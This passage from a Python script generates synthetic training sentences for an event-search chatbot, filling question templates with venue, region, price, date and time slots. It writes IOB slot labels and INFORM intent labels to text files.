"Are there any events that hold in the {part_of_day} and are less than {price} SGD.",
"Are there any events around ${price} in the {part_of_day}.",
"Are there any events around ${price} holding in the {part_of_day}.",
"I would like to find an event that costs {price} dollars at {part_of_day}.",
"I would like to find an event holding at {part_of_day} that costs {price} dollars.",
"I would like to find an event that costs {price} SGD and is in the {part_of_day}.",
"I would like to find an event that is in the {part_of_day} and costs {price} SGD.",
"I would like to find an event in the {part_of_day} that costs ${price}.",
"I would like to find an event at {part_of_day} that costs ${price}.",
"Let me know if there are events that are around {price} dollars in the {part_of_day}.",
"Let me know if there are events in the {part_of_day} that are around {price} dollars.",
"Let me know if there are events occurring in the {part_of_day} that are around {price} dollars.",
"Let me know if there are events holding in the {part_of_day} that are around {price} dollars.",
"Let me know if there are events taking place in the {part_of_day} that are around {price} dollars.",
"Let me know if there are events taking place at {part_of_day} that are around {price} SGD.",
"Let me know if there are events holding at {part_of_day} that are around {price} SGD.",
"Let me know if there are events at {part_of_day} that are around {price} SGD.",
"Let me know if there are events that are less than {price} dollars in the {part_of_day}.",
"Let me know if there are events in the {part_of_day} that are less than {price} dollars.",
"Let me know if there are events holding in the {part_of_day} that are less than {price} dollars.",
"Let me know if there are events occurring in the {part_of_day} that are less than {price} dollars.",
"Let me know if there are events in the {part_of_day} that are less than {price} SGD.",
"Let me know if there are events taking place in the {part_of_day} that are less than {price} SGD.",
"Let me know if there are events less than {price} SGD that are taking place in the {part_of_day}.",
"Let me know if there are events less than {price} SGD that are holding in the {part_of_day}.",
"Let me know if there are events that are around ${price} at {part_of_day}.",
"Let me know if there are events at {part_of_day} that are around ${price}.",
"Let me know if there are events that are around {price} SGD in the {part_of_day}.",
"Let me know if there are events in the {part_of_day} that are around {price} SGD.",
"Will there be events that cost less than {price} dollars in the {part_of_day}?",
"Will there be events in the {part_of_day} that cost less than {price} dollars?",
"Will there be events holding in the {part_of_day} that cost less than {price} dollars?",
"Will there be events occurring in the {part_of_day} that cost less than {price} dollars?",
"Will there be events that cost less than {price} SGD in the {part_of_day}?",
"Will there be events in the {part_of_day} that cost less than {price} SGD?",
"Will there be events taking place in the {part_of_day} that cost less than {price} SGD?",
"Will there be events that cost around {price} dollars in the {part_of_day}?",
"Will there be events in the {part_of_day} that cost around {price} dollars?",
"Will there be events at {part_of_day} that cost around {price} dollars?",
"Will there be events that cost around {price} SGD at {part_of_day}?",
"Will there be events at {part_of_day} that cost around {price} SGD?",
"Will there be events that cost ${price} holding in the {part_of_day}?",
"Will there be events holding in the {part_of_day} that cost ${price}?",
"Will there be events that cost {price} SGD at {part_of_day}?",
"Will there be events at {part_of_day} that cost {price} SGD?",
"Will there be events holding at {part_of_day} that cost {price} SGD?"
]
inform_is_weekend_and_part_of_day_template = [
"Tell me about events that on {is_weekend} in the {part_of_day}.",
"Tell me about events that on {is_weekend} {part_of_day}.",
"Tell me about {part_of_day} events that on {is_weekend}.",
"Tell me about events in the {part_of_day} of {is_weekend}.",
"Which events take place on {is_weekend} in the {part_of_day}.",
"Which events take place on {is_weekend} {part_of_day}.",
"Which {part_of_day} events take place on {is_weekend}.",
"Which events take place in the {part_of_day} of a {is_weekend}.",
"I would like to find an event that is on {is_weekend} {part_of_day}.",
"I would like to find an {part_of_day} event that is on {is_weekend}.",
"I would like to find an event in the {part_of_day} that is on {is_weekend}.",
"I would like to find an event in the {part_of_day} of a {is_weekend}.",
"What events are conducted on {is_weekend} {part_of_day}.",
"What {part_of_day} events are conducted on {is_weekend}.",
"What events are conducted in the {part_of_day} of a {is_weekend}.",
"Will there be events that take place on {is_weekend} {part_of_day}?",
"Will there be {part_of_day} events that take place on {is_weekend}?",
"Will there be events that take place at {part_of_day} of a {is_weekend}?",
"I want to know the events that are available on {is_weekend} {part_of_day}.",
"I want to know the {part_of_day} events that are available on {is_weekend}.",
"I want to know the {part_of_day} events that are available on {is_weekend}.",
"Can you recommend some events on {is_weekend} {part_of_day}?",
"Can you recommend some {part_of_day} events on {is_weekend}?",
"Can you recommend some events in the {part_of_day} of a {is_weekend}?",
"Do you have any suggestions on events on {is_weekend} {part_of_day}?",
"Do you have any suggestions on {part_of_day} events on {is_weekend}?",
"I want to find some events on {is_weekend} {part_of_day}.",
"I want to find some {part_of_day} events on {is_weekend}."
]
file_1 = open('IOB_training.txt', 'w')
file_2 = open('User_intent.txt', 'a+')
count = 0
################## inform 1 slot ###############
for venue_name in sample_venue_name:
for template in inform_venue_name_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_venue_name_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_venue_name_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for region in sample_region:
for template in inform_region_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(region)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_region_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_region_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for event_host in sample_event_host:
for template in inform_event_host_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(event_host)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_event_host_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_event_host_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for date_start in sample_date_start:
for template in inform_date_start_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(date_start)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_date_start_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_date_start_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for time in sample_time:
for template in inform_time_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(time)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_time_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_time_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for price in sample_price:
for template in inform_price_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(price)
label_list = ['O' for i in range(len(token_list)-1)]
try:
index = token_list.index("{}")
except:
try:
index = token_list.index("${}")
except:
index = token_list.index("free")
label_list.insert(index, inform_price_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_price_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for is_weekend in sample_is_weekend:
for template in inform_is_weekend_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(is_weekend)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_is_weekend_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_is_weekend_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for part_of_day in sample_part_of_day:
for template in inform_part_of_day_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(part_of_day)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_part_of_day_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_part_of_day_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
################## inform 2 slots ###############
for venue_name in sample_venue_name:
for region in sample_region:
for template in inform_venue_name_and_region_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, region = region)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, region = "{region}").split(' ')
index_region = token_list.index("{region}")
label_list.insert(index_region, inform_region_tag[0])
for i in range(len(list(filter(None, region.split(' ')))) - 1):
label_list.insert(index_region + 1, inform_region_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for event_host in sample_event_host:
for template in inform_venue_name_and_event_host_template:
template = template.replace('.', '').replace('?', '').replace(',', '').replace('-','')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, event_host = event_host)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, event_host = "{event_host}").split(' ')
index_event_host = token_list.index("{event_host}")
label_list.insert(index_event_host, inform_event_host_tag[0])
for i in range(len(list(filter(None, event_host.split(' ')))) - 1):
label_list.insert(index_event_host + 1, inform_event_host_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for date_start in sample_date_start:
for template in inform_venue_name_and_date_start_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, date_start = date_start)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, date_start = "{date_start}").split(' ')
index_date_start = token_list.index("{date_start}")
label_list.insert(index_date_start, inform_date_start_tag[0])
for i in range(len(list(filter(None, date_start.split(' ')))) - 1):
label_list.insert(index_date_start + 1, inform_date_start_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for time in sample_time:
for template in inform_venue_name_and_time_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, time = time)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, time = "{time}").split(' ')
index_time = token_list.index("{time}")
label_list.insert(index_time, inform_time_tag[0])
for i in range(len(list(filter(None, time.split(' ')))) - 1):
label_list.insert(index_time + 1, inform_time_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for price in sample_price:
for template in inform_venue_name_and_price_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, price = price)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, price = "{price}").split(' ')
try:
index_price = token_list.index("{price}")
except:
try:
index_price = token_list.index("${price}")
except:
index_price = token_list.index("free")
label_list.insert(index_price, inform_price_tag[0])
for i in range(len(list(filter(None, price.split(' ')))) - 1):
label_list.insert(index_price + 1, inform_price_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for is_weekend in sample_is_weekend:
for template in inform_venue_name_and_is_weekend_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, is_weekend = is_weekend)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, is_weekend = "{is_weekend}").split(' ')
index_is_weekend = token_list.index("{is_weekend}")
label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for part_of_day in sample_part_of_day:
for template in inform_venue_name_and_part_of_day_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, part_of_day = part_of_day)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, part_of_day = "{part_of_day}").split(' ')
index_part_of_day = token_list.index("{part_of_day}")
label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for region in sample_region:
for event_host in sample_event_host:
for template in inform_region_and_event_host_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(region = region, event_host = event_host)
label_list = ['O' for i in range(len(token_list) - 2)]
index_region = token_list.index("{region}")
label_list.insert(index_region, inform_region_tag[0])
for i in range(len(list(filter(None, region.split(' '))))-1):
label_list.insert(index_region+1, inform_region_tag[1])
token_list = template.format(region = region, event_host = "{event_host}").split(' ')
index_event_host = token_list.index("{event_host}")
label_list.insert(index_event_host, inform_event_host_tag[0])
for i in range(len(list(filter(None, event_host.split(' ')))) - 1):
label_list.insert(index_event_host + 1, inform_event_host_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for region in sample_region:
for date_start in sample_date_start:
for template in inform_region_and_date_start_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(region = region, date_start = date_start)
label_list = ['O' for i in range(len(token_list) - 2)]
index_region = token_list.index("{region}")
label_list.insert(index_region, inform_region_tag[0])
for i in range(len(list(filter(None, region.split(' '))))-1):
label_list.insert(index_region+1, inform_region_tag[1])
token_list = template.format(region = region, date_start = "{date_start}").split(' ')
index_date_start = token_list.index("{date_start}")
label_list.insert(index_date_start, inform_date_start_tag[0])
for i in range(len(list(filter(None, date_start.split(' ')))) - 1):
label_list.insert(index_date_start + 1, inform_date_start_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for region in sample_region:
for time in sample_time:
for template in inform_region_and_time_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(region = region, time = time)
label_list = ['O' for i in range(len(token_list) - 2)]
index_region = token_list.index("{region}")
label_list.insert(index_region, inform_region_tag[0])
for i in range(len(list(filter(None, region.split(' '))))-1):
label_list.insert(index_region+1, inform_region_tag[1])
token_list = template.format(region = region, time = "{time}").split(' ')
index_time = token_list.index("{time}")
label_list.insert(index_time, inform_time_tag[0])
for i in range(len(list(filter(None, time.split(' ')))) - 1):
label_list.insert(index_time + 1, inform_time_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for region in sample_region:
for price in sample_price:
for template in inform_region_and_price_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(region = region, price = price)
label_list = ['O' for i in range(len(token_list) - 2)]
index_region = token_list.index("{region}")
label_list.insert(index_region, inform_region_tag[0])
for i in range(len(list(filter(None, region.split(' '))))-1):
label_list.insert(index_region+1, inform_region_tag[1])
token_list = template.format(region = region, price = "{price}").split(' ')
try:
index_price = token_list.index("{price}")
except:
try:
index_price = token_list.index("${price}")
except:
index_price = token_list.index("free")
label_list.insert(index_price, inform_price_tag[0])
for i in range(len(list(filter(None, price.split(' ')))) - 1):
label_list.insert(index_price + 1, inform_price_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for region in sample_region:
for is_weekend in sample_is_weekend:
for template in inform_region_and_is_weekend_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(region = region, is_weekend = is_weekend)
label_list = ['O' for i in range(len(token_list) - 2)]
index_region = token_list.index("{region}")
label_list.insert(index_region, inform_region_tag[0])
for i in range(len(list(filter(None, region.split(' '))))-1):
label_list.insert(index_region+1, inform_region_tag[1])
token_list = template.format(region = region, is_weekend = "{is_weekend}").split(' ')
index_is_weekend = token_list.index("{is_weekend}")
label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for region in sample_region:
for part_of_day in sample_part_of_day:
for template in inform_region_and_part_of_day_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(region = region, part_of_day = part_of_day)
label_list = ['O' for i in range(len(token_list) - 2)]
index_region = token_list.index("{region}")
label_list.insert(index_region, inform_region_tag[0])
for i in range(len(list(filter(None, region.split(' '))))-1):
label_list.insert(index_region+1, inform_region_tag[1])
token_list = template.format(region = region, part_of_day = "{part_of_day}").split(' ')
index_part_of_day = token_list.index("{part_of_day}")
label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for event_host in sample_event_host:
for date_start in sample_date_start:
for template in inform_event_host_and_date_start_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(event_host = event_host, date_start = date_start)
label_list = ['O' for i in range(len(token_list) - 2)]
index_event_host = token_list.index("{event_host}")
label_list.insert(index_event_host, inform_event_host_tag[0])
for i in range(len(list(filter(None, event_host.split(' '))))-1):
label_list.insert(index_event_host+1, inform_event_host_tag[1])
token_list = template.format(event_host = event_host, date_start = "{date_start}").split(' ')
index_date_start = token_list.index("{date_start}")
label_list.insert(index_date_start, inform_date_start_tag[0])
for i in range(len(list(filter(None, date_start.split(' ')))) - 1):
label_list.insert(index_date_start + 1, inform_date_start_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for event_host in sample_event_host:
for time in sample_time:
for template in inform_event_host_and_time_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(event_host = event_host, time = time)
label_list = ['O' for i in range(len(token_list) - 2)]
index_event_host = token_list.index("{event_host}")
label_list.insert(index_event_host, inform_event_host_tag[0])
for i in range(len(list(filter(None, event_host.split(' '))))-1):
label_list.insert(index_event_host+1, inform_event_host_tag[1])
token_list = template.format(event_host = event_host, time = "{time}").split(' ')
index_time = token_list.index("{time}")
label_list.insert(index_time, inform_time_tag[0])
for i in range(len(list(filter(None, time.split(' ')))) - 1):
label_list.insert(index_time + 1, inform_time_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for event_host in sample_event_host:
for price in sample_price:
for template in inform_event_host_and_price_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(event_host = event_host, price = price)
label_list = ['O' for i in range(len(token_list) - 2)]
index_event_host = token_list.index("{event_host}")
label_list.insert(index_event_host, inform_event_host_tag[0])
for i in range(len(list(filter(None, event_host.split(' '))))-1):
label_list.insert(index_event_host+1, inform_event_host_tag[1])
token_list = template.format(event_host = event_host, price = "{price}").split(' ')
try:
index_price = token_list.index("{price}")
except:
try:
index_price = token_list.index("${price}")
except:
index_price = token_list.index("free")
label_list.insert(index_price, inform_price_tag[0])
for i in range(len(list(filter(None, price.split(' ')))) - 1):
label_list.insert(index_price + 1, inform_price_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for event_host in sample_event_host:
for is_weekend in sample_is_weekend:
for template in inform_event_host_and_is_weekend_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(event_host = event_host, is_weekend = is_weekend)
label_list = ['O' for i in range(len(token_list) - 2)]
index_event_host = token_list.index("{event_host}")
label_list.insert(index_event_host, inform_event_host_tag[0])
for i in range(len(list(filter(None, event_host.split(' '))))-1):
label_list.insert(index_event_host+1, inform_event_host_tag[1])
token_list = template.format(event_host = event_host, is_weekend = "{is_weekend}").split(' ')
index_is_weekend = token_list.index("{is_weekend}")
label_list.insert(index_is_weekend, inform_is_weekend_tag[0])
for i in range(len(list(filter(None, is_weekend.split(' ')))) - 1):
label_list.insert(index_is_weekend + 1, inform_is_weekend_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for event_host in sample_event_host:
for part_of_day in sample_part_of_day:
for template in inform_event_host_and_part_of_day_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(event_host = event_host, part_of_day = part_of_day)
label_list = ['O' for i in range(len(token_list) - 2)]
index_event_host = token_list.index("{event_host}")
label_list.insert(index_event_host, inform_event_host_tag[0])
for i in range(len(list(filter(None, event_host.split(' '))))-1):
label_list.insert(index_event_host+1, inform_event_host_tag[1])
token_list = template.format(event_host = event_host, part_of_day = "{part_of_day}").split(' ')
index_part_of_day = token_list.index("{part_of_day}")
label_list.insert(index_part_of_day, inform_part_of_day_tag[0])
for i in range(len(list(filter(None, part_of_day.split(' ')))) - 1):
label_list.insert(index_part_of_day + 1, inform_part_of_day_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for date_start in sample_date_start:
for time in sample_time:
for template in inform_date_start_and_time_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(date_start = date_start, time = time)
label_list = ['O' for i in range(len(token_list) - 2)]
index_date_start = token_list.index("{date_start}")
label_list.insert(index_date_start, inform_date_start_tag[0])
for i in range(len(list(filter(None, date_start.split(' '))))-1):
label_list.insert(index_date_start+1, inform_date_start_tag[1])
token_list = template.format(date_start = date_start, time = "{time}").split(' ')
index_time = token_list.index("{time}")
label_list.insert(index_time, inform_time_tag[0])
for i in range(len(list(filter(None, time.split(' ')))) - 1):
label_list.insert(index_time + 1, inform_time_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for date_start in sample_date_start:
for price in sample_price:
for template in inform_date_start_and_price_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(date_start = date_start, price = price)
label_list = ['O' for i in range(len(token_list) - 2)]
index_date_start = token_list.index("{date_start}")
label_list.insert(index_date_start, inform_date_start_tag[0])
for i in range(len(list(filter(None, date_start.split(' '))))-1):
label_list.insert(index_date_start+1, inform_date_start_tag[1])
token_list = template.format(date_start = date_start, price = "{price}").split(' ')
try:
index_price = token_list.index("{price}")
except:
try:
index_price = token_list.index("${price}")
except:
index_price = token_list.index("free")
label_list.insert(index_price, inform_price_tag[0])
for i in range(len(list(filter(None, price.split(' ')))) - 1):
